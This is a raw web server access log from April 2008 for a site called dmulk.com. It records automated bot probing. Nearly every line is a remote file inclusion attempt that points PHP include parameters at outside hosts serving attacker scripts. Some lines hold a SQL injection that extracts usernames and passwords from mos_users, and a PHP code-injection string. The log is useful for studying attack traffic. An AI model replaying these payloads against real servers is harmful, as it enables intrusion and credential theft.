67.228.55.26 - - [23/Apr/2008:10:29:07 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.215.223.191 - - [23/Apr/2008:10:29:10 -0700] "GET /logs/index.php?option=mambo_admin&task=&Itemid=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:29:10 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:29:11 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:29:11 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:29:16 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.215.223.191 - - [23/Apr/2008:10:29:16 -0700] "GET /index.php?option=mambo_admin&task=&Itemid=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
213.176.161.208 - - [23/Apr/2008:10:29:31 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:29:39 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.20 - - [23/Apr/2008:10:29:58 -0700] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.20 - - [23/Apr/2008:10:29:59 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:30:12 -0700] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
207.61.144.44 - - [23/Apr/2008:10:30:14 -0700] "GET /logs/access_080329.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.61.144.44 - - [23/Apr/2008:10:30:14 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:30:15 -0700] "GET //?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:30:16 -0700] "GET /logs//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 44415 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:30:25 -0700] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:30:26 -0700] "GET /logs/access_080201.log//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:30:28 -0700] "GET //?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:30:29 -0700] "GET /logs//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 44415 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:30:29 -0700] "GET //?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:30:30 -0700] "GET /logs//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 44415 "-" "libwww-perl/5.69" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:10:30:33 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.198.149.20 - - [23/Apr/2008:10:30:40 -0700] "GET /logs/access_080115.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:30:45 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:30:45 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:30:45 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.61.144.44 - - [23/Apr/2008:10:30:52 -0700] "GET /logs/access_080308.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stardvb.com/attach/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
219.166.61.155 - - [23/Apr/2008:10:30:53 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "dmulk.com"
219.166.61.155 - - [23/Apr/2008:10:30:53 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "dmulk.com"
89.111.176.20 - - [23/Apr/2008:10:30:54 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://www.westminsterakron.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.20 - - [23/Apr/2008:10:30:55 -0700] "GET //config.inc.php?path_escape=http://www.westminsterakron.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.20 - - [23/Apr/2008:10:30:55 -0700] "GET /logs//config.inc.php?path_escape=http://www.westminsterakron.com/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:31:11 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:31:14 -0700] "GET /logs/access_080218.log/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:31:14 -0700] "GET /activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:31:14 -0700] "GET /logs/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:31:15 -0700] "GET //citywriter/head.php?path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.240.231.154 - - [23/Apr/2008:10:31:17 -0700] "GET /logs/access_080224.log//index.php?pagina=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:31:20 -0700] "GET /logs/access_080225.log/index2.php?x=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:31:20 -0700] "GET /index2.php?x=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:31:21 -0700] "GET /logs/index2.php?x=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:10:31:21 -0700] "GET /logs/access_080218.log/activecontent.php?vsDragonRootPath=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:31:22 -0700] "GET /logs/access_080302.log/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:31:27 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:10:31:28 -0700] "GET /activecontent.php?vsDragonRootPath=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:10:31:28 -0700] "GET /logs/activecontent.php?vsDragonRootPath=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:31:28 -0700] "GET /logs/access_080215.log//?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:10:31:28 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:10:31:29 -0700] "GET //config.inc.php?path_escape=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:10:31:30 -0700] "GET /logs//config.inc.php?path_escape=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.26.52.49 - - [23/Apr/2008:10:31:38 -0700] "GET /logs/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [23/Apr/2008:10:31:40 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:10:31:41 -0700] "GET /logs/access_080302.log/activecontent.php?vsDragonRootPath=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.26.52.49 - - [23/Apr/2008:10:31:41 -0700] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.5.1 - - [23/Apr/2008:10:31:42 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 200 50 "-" "libwww-perl/5.65" "www.dmulk.com"
59.125.5.1 - - [23/Apr/2008:10:31:43 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.240.231.154 - - [23/Apr/2008:10:32:02 -0700] "GET /logs/access_080225.log//index.php?pagina=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:32:07 -0700] "GET /index2.php?x=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:32:07 -0700] "GET /logs/index2.php?x=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:32:22 -0700] "GET /logs/access_080215.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:32:45 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:32:45 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:32:45 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:32:47 -0700] "GET /logs/access_080215.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:32:58 -0700] "GET /index2.php?x=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:33:20 -0700] "GET /logs/access_071218.log/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:33:21 -0700] "GET /modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:33:21 -0700] "GET /logs/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:33:21 -0700] "GET /logs/access_071231.log/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:30 -0700] "GET /logs/access_080218.log/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:33:30 -0700] "GET /logs/access_080309.log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:33:33 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.803" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:33 -0700] "GET /activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:33:34 -0700] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:33:34 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:34 -0700] "GET /logs/access_080218.log/activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:34 -0700] "GET /activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:35 -0700] "GET /logs/access_080218.log/activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:35 -0700] "GET /logs/activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:33:35 -0700] "GET /modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:35 -0700] "GET /activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:39 -0700] "GET /logs/activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.156.192.5 - - [23/Apr/2008:10:33:40 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.156.192.5 - - [23/Apr/2008:10:33:44 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:33:46 -0700] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:33:46 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:33:46 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:33:48 -0700] "GET /index.php?body=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:50 -0700] "GET /logs/access_080218.log/activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:52 -0700] "GET /logs/access_080218.log/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:52 -0700] "GET /activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:53 -0700] "GET /logs/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:33:53 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:33:54 -0700] "GET /logs/activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:34:10 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:34:10 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:34:11 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:34:12 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&p=2195//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:34:12 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:34:13 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:34:13 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:34:13 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:34:14 -0700] "GET /logs/access_080120.log/myevent.php?myevent_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:34:14 -0700] "GET /myevent.php?myevent_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:34:14 -0700] "GET /logs/myevent.php?myevent_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:34:15 -0700] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:34:15 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=2195//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:34:17 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=2195//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.95.82.113 - - [23/Apr/2008:10:34:17 -0700] "GET /logs/access.log/index2.php?x=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:34:22 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:34:22 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:34:22 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:34:23 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
